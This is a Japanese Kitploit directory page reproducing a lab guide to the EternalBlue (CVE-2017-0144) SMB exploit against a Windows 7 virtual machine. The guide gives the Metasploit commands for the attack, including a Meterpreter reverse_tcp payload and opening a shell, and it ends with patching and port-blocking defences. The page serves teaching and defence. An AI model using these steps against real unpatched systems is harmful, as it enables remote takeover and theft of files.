Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SMB-Protocol-Vulnerability_CVE-2017-0144 — Step-by-step lab guide demonstrating the EternalBlue exploit (CVE-2017-0144) against Windows 7 SMB protocol using Metasploit, including setup, exploitation, and mitigation steps. | Kitploit
ツール/GitHubGitHub/luckyman2907/smb-protocol-vulnerability_cve-2017-0144
脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテスト学習と教育ラボと実践
GitHubluckyman2907/smb-protocol-vulnerability_cve-2017-0144

SMB-Protocol-Vulnerability_CVE-2017-0144

Step-by-step lab guide demonstrating the EternalBlue exploit (CVE-2017-0144) against Windows 7 SMB protocol using Metasploit, including setup, exploitation, and mitigation steps.

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

LAB: SMBプロトコルの脆弱性を利用したWindows OS攻撃

  • 1. 説明
  • 2. 概要
  • 3. 準備
  • 4. 攻撃の実行
  • 5. 防御方法

1. 説明

このラボでは、2台のコンピュータを使用して、Windows OSのSMBプロトコルの脆弱性を利用した攻撃をシミュレーションします。1台はKali Linux OSを実行し、攻撃者(ハッカー)の役割を担います。もう1台は被害者(victim)の役割を担うコンピュータです。被害者マシンはSMB脆弱性を含むWindows 7 64ビットOSを実行しています。これを行うために、Kali Linuxマシン上で EternalBlue というエクスプロイトコードを使用してWindows 7マシンを攻撃します。

2. 概要

Server Message Block (SMB) は、MicrosoftのWindowsプラットフォーム上で非常に一般的なファイル共有プロトコルです。このSMBプロトコルにより、同じネットワークセグメント内または同じドメイン内で接続されたWindowsコンピュータ同士がファイルを共有できます。現在、SMBは Common Internet File Sharing (CIFS) とも呼ばれています。

EternalBlue は、ポート445を介したSMBプロトコルの脆弱性を利用する情報エクスプロイトコードです。当初、EternalBlue は 米国国家安全保障局(NSA) によって開発されました。英語の正式名称は U.S. National Security Agency です。しかしその後、2017年にハッカーグループ The Shadow Brokers によって漏洩しました。同じ年、Microsoft Windowsを実行するコンピュータを標的にした、ランサムウェア(身代金要求型マルウェア)による大規模な攻撃が世界中で発生しました。その中でも最も有名なのが WannaCry ウイルスです。現在、この脆弱性はMicrosoftによってセキュリティ更新プログラム MS17-010 で修正されていますが、世界中の多くのWindows OSを実行するコンピュータにまだこの脆弱性が存在しています。この脆弱性は CVE-2017-0144 (Windows SMB Remote Code Execution Vulnerability)として公開されています。この脆弱性は非常に危険であり、容易に悪用される可能性があります。特筆すべきは、このSMBプロトコルの脆弱性を介して攻撃するために、ハッカーは被害者に悪意のあるウイルスをダウンロードさせたり実行させたりする必要がないことです。つまり、被害者が何もしなくても、ハッカーは容易に攻撃してコンピュータの制御を奪い、被害者はそれに気づかないのです。

3. 準備

VMware Workstationソフトウェア上で動作する2台の仮想マシンを準備します:

  • Kali Linux 仮想マシン(ハッカーマシン): IPアドレス 192.168.198.140
  • Windows 7 仮想マシン(被害者マシン): IPアドレス 192.168.198.143

  1. Kali (攻撃) 仮想マシン上:

    • IPアドレスの確認: ifconfig
    • Postgresql サービスの起動: service postgresql start
    • Postgresql が起動しているか確認: service postgresql status
  2. Windows 7 (被害者) 仮想マシン上:

    • IPアドレスの確認: ipconfig
    • ファイアウォールの無効化

4. 攻撃の実行

  • Kaliマシン上: Metasploit にログイン: msfconsole

  • Metasploit に入ったら、ms17_010 に関連するバグや構文を検索: search ms17_010

  • 被害者マシンと攻撃マシンのIPアドレスを追加
  • エクスプロイト用のペイロードを設定: use 0 -> set payload windows/x64/meterpreter/reverse_tcp

  • エクスプロイトを実行して攻撃を開始
  • 侵入後、被害者マシン上でシェルを開く(攻撃マシンのターミナル経由で実行)

=>これでハッカーは被害者マシンへの侵入に成功したと見なされます。この時点で、ハッカーは被害者が気づかないうちにファイルを削除したり盗んだりできます。さらに、ハッカーはウイルスを直接アップロードして実行することも可能です。

5. 防御方法

SMBプロトコルの悪用や搾取を防ぐには、次の作業を実行する必要があります:

  • ファイアウォールを有効にする。
  • Windows を最新バージョンに更新する。または Microsoft のセキュリティパッチをダウンロードして適用する。特にセキュリティパッチ ms17_010 が重要。
  • ポート135、445をブロックする。
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"
ツールをダウンロード